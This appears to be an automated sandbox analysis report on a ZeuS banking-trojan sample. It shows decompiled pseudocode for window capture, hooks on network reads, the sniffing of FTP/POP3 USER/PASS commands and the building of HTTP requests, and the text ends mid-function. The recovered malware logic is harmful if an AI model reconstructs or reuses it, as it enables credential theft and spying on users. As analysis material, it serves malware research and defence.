  • Instruction ID: 4a1a4cdf0d7351be7e10076b9b38a199d20ba1357be06bf9bcee2250c5f83625
  • Opcode Fuzzy Hash: 5440b081e5c14d004d77e6db19f0da771aa4d30ea54d1c0c1fc6eae15c025d27
  • Instruction Fuzzy Hash: 9C61BEB8A00201EFD3A0CF68EFC0A507BE4B3483543E5417AE918E7770E2B5A596DB5D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00406397() {
				signed int _t23;
				signed int _t43;
				signed int _t59;
				signed int* _t63;
				signed int _t64;

				_t23 =  *0x4231ac;
				if(_t23 >= 0x270) {
					_t64 = 0;
					do {
						_t59 = _t64;
						_t64 = _t64 + 1;
						0x4227e0[_t59] = (( *(0x4227e4 + _t59 * 4) ^ 0x4227e0[_t59]) & 0x7fffffff ^ 0x4227e0[_t59]) >> 0x00000001 ^  *(0x422000 + ((( *(0x4227e4 + _t59 * 4) ^ 0x4227e0[_t59]) & 0x7fffffff ^ 0x4227e0[_t59]) & 0x00000001) * 4) ^  *(0x422e14 + _t59 * 4);
					} while (_t64 < 0xe3);
					if(_t64 < 0x26f) {
						_t63 =  &(0x4227e0[_t64]);
						do {
							 *_t63 =  *(0x422000 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
							_t63 =  &(_t63[1]);
						} while (_t63 < 0x42319c);
					}
					_t43 =  *0x4227e0; // 0x0
					 *0x42319c = ((_t43 ^  *0x42319c) & 0x7fffffff ^  *0x42319c) >> 0x00000001 ^  *(0x422000 + (((_t43 ^  *0x42319c) & 0x7fffffff ^  *0x42319c) & 0x00000001) * 4) ^  *0x422e10;
					_t23 = 0;
				}
				 *0x4231ac = _t23 + 1;
				return (0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}

Instruction addresses (per-line address column, collapsed): 0x00406397 to 0x0040648a

Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: 30038f3f01e29ea84985964fb5dbad04da84fad0a7c145f422a9bf2c0fe4df14
  • Instruction ID: 3f994de3488e29091ca47e3073ab5fd6046650022841614af530443dd6c7cbd3
  • Opcode Fuzzy Hash: 30038f3f01e29ea84985964fb5dbad04da84fad0a7c145f422a9bf2c0fe4df14
  • Instruction Fuzzy Hash: 4E21C6323304009BD358DF3DED55A1A33E2E789358796843DD616D32A0D678E923CB4C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 44%
			E00416C62(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _t12;
				intOrPtr _t18; // declaration added; _t18 is assigned from _a16 below but was undeclared in the decompiler output

				if(E0041CAA4() == 0 || _a8 == 0 || _a12 <= 0) {
					L5:
					return InternetReadFile();
				}
				_t18 = _a16;
				if(_a16 == 0) {
					goto L5;
				}
				_t12 = E0041651A(_t18,  &_a4, _a8, _a12, _a16);
				if(_t12 == 0xffffffff) {
					goto L5;
				}
				return _t12;
			}

Instruction addresses (per-line address column, collapsed): 0x00416c6c to 0x00416c9e

Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CriticalSection$EnterLeaveObjectSingleWait
  • String ID:
  • API String ID: 501323975-0
  • Opcode ID: acc8290f2fcae533d9b5f27e27748a4bcde134c1bd91da6c49d678795a56892d
  • Instruction ID: a1c3eb8d67e2cf2cdf3e7a1924a5c8afb0f628e445b155b91b28c913fa100db8
  • Opcode Fuzzy Hash: acc8290f2fcae533d9b5f27e27748a4bcde134c1bd91da6c49d678795a56892d
  • Instruction Fuzzy Hash: 8DE0927140020EEADF219F71AA006EF3394EE00365B014527B864951D1E339E5E0DF99
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
  • Instruction ID: e310851ef817243b59dbee2fda323c9f887b0857c3cf67b7e11af2043df4d9f3
  • Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
  • Instruction Fuzzy Hash: 83E0867AB801518BD755CE55D8C0D83B7A6FBD9370B2286E6C81587306CA38EDC3C6D5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)

  • Basic blocks span 417275 to 417602; internal calls to 40d2f3 and 417193
  • API calls in the graph: GetWindowInfo, IntersectRect, GetDC, CreateCompatibleDC, ReleaseDC, SelectObject, DeleteDC, TlsSetValue, EqualRect, SaveDC, SetViewportOrgEx, SendMessageW, RestoreDC, DefWindowProcW, PrintWindow
C-Code - Quality: 95%
			E00417275(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
				char _v9;
				signed int _v10;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* _v68;
				signed int _v72;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				struct HDC__* _v96;
				struct HWND__* _v100;
				void _v104;
				intOrPtr _v140;
				intOrPtr _v156;
				struct tagWINDOWINFO _v164;
				signed int _t128;
				signed int _t135;
				void* _t140;
				void* _t146;
				signed int _t164;
				intOrPtr _t191;
				long _t192;
				intOrPtr _t195;
				long _t196;
				long _t210;
				long _t211;
				long _t212;
				long _t213;
				signed int _t214;
				signed int _t215;
				RECT* _t216;
				struct HDC__* _t217;
				struct HDC__* _t221;

				_t214 = __edx;
				_t216 = __eax;
				_t128 = E0040D2F3(_a8) & 0x0000ffff;
				_v16 = _t128;
				if((_t128 & 0x00000001) == 0) {
					if(_t128 == 0) {
						_v16 = 2;
						_t128 = _v16;
					}
					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
						_v16 = _t128 & 0x0000fffd | 0x00000008;
					}
					_v24 = 0;
					_v20 = 0;
					_v28 = 0;
					_v32 = 0;
					_v164.cbSize = 0x3c;
					if(GetWindowInfo(_a8,  &_v164) != 0) {
						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
						_v10 = _t215;
						if(_t215 != 0) {
							_t212 = _t216->top;
							_t195 = _v156;
							if(_t195 < _t212) {
								_v20 = _t195 - _t212;
							}
							_t213 = _t216->left;
							_t196 = _v164.rcWindow.left;
							if(_t196 < _t213) {
								_v24 = _t196 - _t213;
							}
						}
						_t135 = _v16 & 0x00000002;
						_v72 = _t135;
						if(_t135 == 0) {
							_a15 = _t215;
						} else {
							if((_v164.dwStyle & 0x20000000) == 0) {
								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
								if(_a15 != 0) {
									_t210 = _t216->top;
									_t191 = _v140;
									if(_t191 < _t210) {
										_v32 = _t191 - _t210;
									}
									_t211 = _t216->left;
									_t192 = _v164.rcClient.left;
									if(_t192 < _t211) {
										_v28 = _t192 - _t211;
									}
								}
							} else {
								_a15 = 0;
							}
						}
						if(_v10 != 0 || _a15 != 0) {
							_t217 = GetDC(0);
							if(_t217 == 0) {
								goto L8;
							}
							_t221 = CreateCompatibleDC(_t217);
							ReleaseDC(0, _t217);
							if(_t221 == 0) {
								goto L8;
							}
							_t218 = _a4;
							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
							_v68 = _t140;
							if(_t140 != 0) {
								_v9 = 1;
								if(_v72 == 0) {
									if((_v16 & 0x00000004) == 0) {
										if((_v16 & 0x00000008) == 0) {
											L56:
											SelectObject(_t221, _v68);
											DeleteDC(_t221);
											return _v9;
										}
										if(_v24 != 0 || _v20 != 0) {
											SetViewportOrgEx(_t221, _v24, _v20, 0);
										}
										_t146 = E00417193(_t218,  &_v64, 0);
										__imp__PrintWindow(_a8, _t221, 0);
										if(_t146 != 0) {
											L55:
											E00417193(_t218,  &_v64, 1);
										} else {
											_v9 = 0;
										}
										goto L56;
									}
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E00417193(_t218,  &_v64, 0);
									DefWindowProcW(_a8, 0x317, _t221, 0xe);
									goto L55;
								}
								_v100 = _a8;
								_v96 = _t221;
								_v84 = _v48.right - _v48.left;
								_v76 = 1;
								_v80 = _v48.bottom - _v48.top;
								_v92 = 0;
								_v88 = 0;
								TlsSetValue( *0x42323c,  &_v104);
								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
									_v16 = SaveDC(_t221);
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E00417193(_a4,  &_v64, 0);
									_v104 = 0;
									SendMessageW(_a8, 0x85, 1, 0);
									if(_v104 == 0) {
										DefWindowProcW(_a8, 0x317, _t221, 2);
									}
									E00417193(_a4,  &_v64, 1);
									RestoreDC(_t221, _v16);
								}
								if(_a15 != 1) {
									L49:
									TlsSetValue( *0x42323c, 0);
									goto L56;
								} else {
									if(_v28 != 0) {
										L41:
										_a15 = 1;
										L42:
										_v16 = SaveDC(_t221);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										E00417193(_a4,  &_v48, 0);
										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
										asm("sbb eax, eax");
										_v76 =  ~_t164 + 1;
										RestoreDC(_t221, _v16);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										_v104 = 0;
										SendMessageW(_a8, 0xf, 0, 0);
										if(_v104 == 0) {
											DefWindowProcW(_a8, 0x317, _t221, 4);
										}
										E00417193(_a4,  &_v48, 1);
										goto L49;
									}
									_a15 = 0;
									if(_v32 == 0) {
										goto L42;
									}
									goto L41;
								}
							}
							DeleteDC(_t221);
							goto L8;
						} else {
							goto L1;
						}
					}
					L8:
					return 0;
				}
				L1:
				return 1;
			}

APIs
    • Part of subcall function 0040D2F3: GetClassNameW.USER32 ref: 0040D30E
  • GetWindowInfo.USER32 ref: 004172E1
  • SelectObject.GDI32(00000000,?), ref: 004175B0
  • DeleteDC.GDI32(00000000), ref: 004175B7
  • SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 004175DF
  • PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 004175F5
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
  • String ID: <
  • API String ID: 3458064076-4251816714
  • Opcode ID: 3e00893bffa9ee1258983e1421520ec10ddb6fd8cde11ad1c341e5170e57d74d
  • Instruction ID: 6fc06406df126ba94831ea69ac012378c3f6c03d4619ea1dde91af8773eb0296
  • Opcode Fuzzy Hash: 3e00893bffa9ee1258983e1421520ec10ddb6fd8cde11ad1c341e5170e57d74d
  • Instruction Fuzzy Hash: 98C18D71D04249BFDF11DFA4DD84EEEBFB9AF04300F04806AF915A6621D7388A85DB69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E0040D35A(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
				char _v5;
				struct HDC__* _v12;
				char _v16;
				short _v124;
				void* _v134;
				char _v612;
				char _v1081;
				char _v1428;
				void* _t60;
				long _t62;
				void* _t66;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t80;
				struct HDC__* _t82;
				int _t85;
				void* _t87;
				signed char _t90;
				void* _t92;
				void* _t107;
				struct HDC__* _t108;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t120;
				void** _t124;

				_t124 = __esi;
				_t120 = __edx;
				E00405299(_t60, __esi, 0, 0x18c);
				_t62 = TlsAlloc();
				__esi[1] = _t62;
				if(_t62 != 0xffffffff) {
					E0041C946(0x84889911,  &_v124, 0);
					_t66 = RegisterWindowMessageW( &_v124);
					__esi[2] = _t66;
					__eflags = _t66;
					if(_t66 == 0) {
						goto L1;
					}
					E0041C946(0x84889912,  &_v124, 1);
					_t71 = CreateEventW(0x4239e8, 1, 0,  &_v124);
					__esi[3] = _t71;
					__eflags = _t71;
					if(_t71 == 0) {
						goto L1;
					}
					E0041C946(0x18782822,  &_v124, 1);
					_t75 = CreateMutexW(0x4239e8, 0,  &_v124);
					__esi[5] = _t75;
					__eflags = _t75;
					if(_t75 == 0) {
						goto L1;
					}
					E0041C946(0x9878a222,  &_v124, 1);
					_t79 = CreateFileMappingW(0, 0x4239e8, 4, 0, 0x3d09128,  &_v124);
					 *__esi = _t79;
					__eflags = _t79;
					if(_t79 == 0) {
						goto L1;
					}
					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
					__eflags = _t80;
					if(_t80 == 0) {
						goto L1;
					}
					__esi[4] = _t80;
					__esi[6] = _t80 + 0x128;
					_v5 = 0;
					_t82 = GetDC(0);
					_v12 = _t82;
					__eflags = _t82;
					if(_t82 == 0) {
						L22:
						return _v5;
					}
					__esi[9] = 0;
					__esi[0xa] = 0;
					__esi[0xb] = GetDeviceCaps(_t82, 8);
					_t85 = GetDeviceCaps(_v12, 0xa);
					_t118 = __esi[0xb];
					__esi[0xc] = _t85;
					__eflags = CreateCompatibleBitmap(_v12, __esi[0xb], _t85);
					if(__eflags == 0) {
						_t87 = 0;
						__eflags = 0;
					} else {
						_t24 =  &(_t124[8]); // 0x423258
						_t87 = E0040B790(_t118, _t120, __eflags, _v12,  &_v16, _t24, 0, 0, _t86);
					}
					_t124[7] = _t87;
					ReleaseDC(0, _v12);
					__eflags = _t124[7];
					if(_t124[7] != 0) {
						_t119 = _v16;
						_t90 =  *(_v16 + 0xe) >> 3;
						_t124[0xe] = _t90;
						_t92 = (_t90 & 0x000000ff) * _t124[0xb];
						_t124[0xd] = _t92;
						__eflags = _t92 & 0x00000003;
						if((_t92 & 0x00000003) != 0) {
							_t92 = (_t92 & 0xfffffffc) + 4;
							__eflags = _t92;
						}
						_t124[0xd] = _t92;
						E004051E6(_t119);
						__eflags = _a4 - 1;
						_v5 = 1;
						if(_a4 != 1) {
							goto L22;
						}
						_v5 = 0;
						E0041CC1D( &_v1428);
						E0041CC4A(_t119,  &_v612);
						_t43 =  &(_t124[0xf]); // 0x423274
						E00405222(_t43, 0x423c28, 0x10);
						_t124[0x13] = _v134;
						_t47 =  &(_t124[0x14]); // 0x423288
						E00405222(_t47,  &_v1081, 0x102);
						E0041C946(0x1898b122,  &_v124, 1);
						_t107 = CreateMutexW(0x4239e8, 0,  &_v124);
						_t124[0x58] = _t107;
						__eflags = _t107;
						if(_t107 == 0) {
							goto L1;
						}
						_t108 = GetDC(0);
						_a4 = _t108;
						__eflags = _t108;
						if(_t108 != 0) {
							_t109 = CreateCompatibleDC(_t108);
							_t124[0x55] = _t109;
							__eflags = _t109;
							if(_t109 != 0) {
								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
								_t124[0x57] = _t111;
								__eflags = _t111;
								if(_t111 != 0) {
									_t112 = SelectObject(_t124[0x55], _t111);
									_t124[0x56] = _t112;
									__eflags = _t112;
									if(_t112 != 0) {
										_v5 = 1;
									}
								}
							}
							ReleaseDC(0, _a4);
						}
					}
					goto L22;
				}
				L1:
				return 0;
			}

APIs
  • TlsAlloc.KERNEL32(00423238,00000000,0000018C,00000000,00000000), ref: 0040D373
  • RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0040D39B
  • CreateEventW.KERNEL32(004239E8,00000001,00000000,?,84889912,?,00000001), ref: 0040D3C5
  • CreateMutexW.KERNEL32(004239E8,00000000,?,18782822,?,00000001), ref: 0040D3E8
  • CreateFileMappingW.KERNEL32(00000000,004239E8,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0040D413
  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040D429
  • GetDC.USER32(00000000), ref: 0040D446
  • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040D466
  • GetDeviceCaps.GDI32(?,0000000A), ref: 0040D470
  • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0040D483
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
  • String ID: 9B
  • API String ID: 3765073151-1919367578
  • Opcode ID: cd9ede4be7e70c84d13df6d5cf00e9c1ba245c1c42a6c81821f10444fef4fff8
  • Instruction ID: c936e12c2cb7e1d96a9044a596121dfe7a94f8eb05a52cc999b983df75719d79
  • Opcode Fuzzy Hash: cd9ede4be7e70c84d13df6d5cf00e9c1ba245c1c42a6c81821f10444fef4fff8
  • Instruction Fuzzy Hash: 7F7132B1900744BFDB209FB1CD85AEA7BBCEB04304F10493EF952E2291D67999898F65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph for E00416E73 (graph image not reproduced; basic blocks 416e73-4170e9, edge list omitted). API calls on graph nodes: EnterCriticalSection, LeaveCriticalSection, getpeername; internal subcalls: 416d6b, 416e0a, 405426, 416da4, 4051e6, 40f34a, 408690, 408647, 418864, 405df6.
C-Code - Quality: 82%
			E00416E73(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
				char _v536;
				char _v652;
				char _v664;
				char _v696;
				char _v700;
				char _v701;
				char _v708;
				void* __esi;
				char* _t35;
				void* _t40;
				char* _t43;
				intOrPtr _t44;
				void* _t47;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				signed int* _t71;
				intOrPtr _t73;
				signed int _t75;
				signed char _t76;
				intOrPtr _t79;
				signed int _t80;
				intOrPtr _t83;
				signed int* _t84;
				intOrPtr _t85;
				void* _t87;
				char* _t92;
				void* _t93;
				intOrPtr* _t94;

				_t80 = __edx;
				_t87 = __eax;
				_t71 = __ecx;
				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
					L51:
					_t35 = 0;
					__eflags = 0;
				} else {
					if(__eax <= 6) {
						L24:
						__eflags = _t87 - 1;
						if(_t87 <= 1) {
							goto L51;
						} else {
							EnterCriticalSection(0x423444);
							_t83 = E00416D6B(_a4);
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags =  *((intOrPtr*)(_t83 + 4));
								if( *((intOrPtr*)(_t83 + 4)) == 0) {
									L48:
									_push(0);
									goto L49;
								} else {
									__eflags =  *((intOrPtr*)(_t83 + 8));
									if( *((intOrPtr*)(_t83 + 8)) == 0) {
										goto L48;
									} else {
										__eflags = _t87 - 3;
										if(_t87 < 3) {
											L33:
											__eflags = _t87 - 4;
											if(_t87 >= 4) {
												_t75 =  *_t71 ^ 0x02000809;
												__eflags = _t75 - 0x4750515d;
												if(_t75 == 0x4750515d) {
													goto L37;
												} else {
													__eflags = _t75 - 0x56414d4f;
													if(_t75 == 0x56414d4f) {
														goto L37;
													} else {
														__eflags = _t75 - 0x54534959;
														if(_t75 != 0x54534959) {
															__eflags = _t75 - 0x56415c5a;
															if(_t75 == 0x56415c5a) {
																L40:
																_t76 = 0x65;
																_push(0x15);
																goto L41;
															} else {
																__eflags = _t75 - 0x56534145;
																if(_t75 == 0x56534145) {
																	goto L40;
																}
															}
														} else {
															goto L37;
														}
													}
												}
											}
										} else {
											_t58 =  *_t71;
											__eflags = _t58 - 0x43;
											if(_t58 == 0x43) {
												L31:
												__eflags = _t71[0] - 0x57;
												if(_t71[0] != 0x57) {
													goto L33;
												} else {
													__eflags = _t71[0] - 0x44;
													if(_t71[0] == 0x44) {
														L37:
														_t76 = 0x64;
														_push(0x14);
														L41:
														_pop(_t40);
														E0040F34A(_t40,  &_v696);
														_t43 =  &_v652;
														_v700 = 0x80;
														__imp__#5(_a4, _t43,  &_v700);
														__eflags = _t43;
														if(_t43 == 0) {
															_t78 =  &_v664;
															_t44 = E00408690( &_v664);
															__eflags = _t44;
															if(_t44 == 0) {
																__eflags = _t76 - 0x65;
																if(_t76 == 0x65) {
																	L46:
																	E00408647( &_v664, _t78,  &_v536);
																	_t47 = 0x13;
																	E0040F34A(_t47,  &_v696);
																	_push( &_v536);
																	_push( *((intOrPtr*)(_t83 + 8)));
																	_push( *((intOrPtr*)(_t83 + 4)));
																	E00418864(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
																} else {
																	__eflags = _t76 - 0x64;
																	if(_t76 == 0x64) {
																		_t92 =  &_v696;
																		_t54 = 0x16;
																		E0040F34A(_t54, _t92);
																		_push( *((intOrPtr*)(_t83 + 4)));
																		_t80 = _t80 | 0xffffffff;
																		_t56 = 9;
																		_t78 = _t92;
																		_t57 = E00405DF6(_t56, _t92, _t80);
																		__eflags = _t57;
																		if(_t57 != 0) {
																			goto L46;
																		}
																	}
																}
															}
														}
														_push(0);
														L49:
														E00416E0A(_t83);
													} else {
														goto L33;
													}
												}
											} else {
												__eflags = _t58 - 0x50;
												if(_t58 != 0x50) {
													goto L33;
												} else {
													goto L31;
												}
											}
										}
									}
								}
							}
							_t73 = 0;
							goto L23;
						}
					} else {
						_t60 =  *__ecx ^ 0x02000809;
						if(_t60 == 0x50455b5c || _t60 == 0x51534959) {
							if(_t71[1] != 0x20) {
								goto L24;
							} else {
								_t61 = 0;
								_t93 = _t87 + 0xfffffffb;
								_t84 =  &(_t71[1]);
								if(_t93 == 0) {
									goto L51;
								} else {
									while(1) {
										_t79 =  *((intOrPtr*)(_t61 + _t84));
										if(_t79 == 0xd || _t79 == 0xa) {
											break;
										}
										if(_t79 < 0x20) {
											goto L51;
										} else {
											_t61 = _t61 + 1;
											if(_t61 < _t93) {
												continue;
											} else {
												break;
											}
										}
										goto L52;
									}
									if(_t61 == 0 || _t61 == _t93) {
										goto L51;
									} else {
										_t85 = E00405426(_t61, 0xfde9, _t84);
										if(_t85 == 0) {
											goto L51;
										} else {
											_v701 = 0;
											EnterCriticalSection(0x423444);
											_t94 = E00416D6B(_a4);
											if(_t94 != 0) {
												L18:
												__eflags =  *_t71 - 0x55;
												_v701 = 1;
												if( *_t71 != 0x55) {
													E004051E6( *((intOrPtr*)(_t94 + 8)));
													 *((intOrPtr*)(_t94 + 8)) = _t85;
												} else {
													E00416E0A(_t94, 1);
													 *((intOrPtr*)(_t94 + 4)) = _t85;
												}
												 *_t94 = _a4;
											} else {
												_t94 = E00416DA4(_a4);
												if(_t94 != 0) {
													goto L18;
												} else {
													E004051E6(_t85);
												}
											}
											_t73 = _v701;
											L23:
											LeaveCriticalSection(0x423444);
											_t35 = _t73;
										}
									}
								}
							}
						} else {
							goto L24;
						}
					}
				}
				L52:
				return _t35;
			}

APIs
  • EnterCriticalSection.KERNEL32(00423444,0000FDE9,?), ref: 00416F28
  • LeaveCriticalSection.KERNEL32(00423444,?,000000FF), ref: 00416F83
  • EnterCriticalSection.KERNEL32(00423444), ref: 00416F9E
  • getpeername.WS2_32 ref: 0041704B
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CriticalSection$Enter$Leavegetpeername
  • String ID: $D$EASV$OMAV$U$W$YISQ$YIST$Z\AV$\[EP$]QPG
  • API String ID: 1099368488-790062061
  • Opcode ID: f7535fcba6434da17d520036efa07fec045eb6ad295ed609f7627973dd9a9245
  • Instruction ID: f48791b59930f81b68cb2578de48ca0e614e113c221ef35d1368b035bc8423c6
  • Opcode Fuzzy Hash: f7535fcba6434da17d520036efa07fec045eb6ad295ed609f7627973dd9a9245
  • Instruction Fuzzy Hash: 505167316083019ADF309A24CC857EB7FA15B09714F15862BF984A72A1DB3DDCC6874E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E004126B5(void _a4) {
				long _v12;
				void* _v16;
				void* _v20;
				char _v22;
				short _v24;
				char* _v32;
				char* _v36;
				intOrPtr _v40;
				void* _v44;
				char _v56;
				char _v64;
				char _v548;
				char _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void* _t56;
				intOrPtr _t58;
				void* _t63;
				void* _t67;
				void* _t94;
				void* _t97;
				char* _t99;
				intOrPtr* _t106;
				void* _t109;
				intOrPtr* _t110;
				void* _t114;

				_t106 = _a4;
				if(E00409C4B( &_v36,  *((intOrPtr*)(_t106 + 4))) == 0) {
					L25:
					return 0;
				}
				_t53 = InternetOpenA( *0x423c24, 0, 0, 0, 0);
				_v44 = _t53;
				if(_t53 == 0) {
					L24:
					E004051E6(_v36);
					E004051E6(_v32);
					goto L25;
				}
				_t56 = InternetConnectA(_t53, _v36, _v24, 0, 0, 3, 0, 0);
				_v20 = _t56;
				if(_t56 == 0) {
					L23:
					InternetCloseHandle(_v44);
					goto L24;
				}
				_t58 =  *_t106;
				_t99 = "POST";
				if( *((char*)(_t58 + 0x18)) != 1) {
					_t99 = "GET";
				}
				_t97 = HttpOpenRequestA(_v20, _t99, _v32, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v22 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v16 = _t97;
				if(_t97 == 0) {
					L22:
					InternetCloseHandle(_v20);
					goto L23;
				} else {
					E0041CC4A(_t99,  &_v552);
					_t63 = 0xe;
					E0040F314(_t63,  &_v64);
					_t66 =  *_a4;
					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
						_t94 = E00405FAA( &_v12,  &_v64,  *((intOrPtr*)(_t66 + 0x1c)));
						_t114 = _t114 + 0xc;
						if(_t94 > 0) {
							HttpAddRequestHeadersA(_t97, _v12, 0xffffffff, 0xa0000000);
							E004051E6(_v12);
						}
					}
					_t67 = 0xf;
					E0040F314(_t67,  &_v56);
					_v40 = E00405D35( &_v548);
					_t109 = E004051B6(2 + _t69 * 6);
					if(_t109 == 0) {
						_t109 = 0;
					} else {
						E00409F76(_t109,  &_v548, _v40);
						_t97 = _v16;
					}
					if(_t109 != 0 && E00405FAA( &_v12,  &_v56, _t109) > 0) {
						HttpAddRequestHeadersA(_t97, _v12, 0xffffffff, 0xa0000000);
						E004051E6(_v12);
					}
					E004051E6(_t109);
					_t110 = _a4;
					if(HttpSendRequestA(_t97, 0, 0,  *( *_t110 + 0x24),  *( *_t110 + 0x28)) != 1) {
						L21:
						InternetCloseHandle(_t97);
						goto L22;
					} else {
						_v12 = 4;
						_a4 = 0;
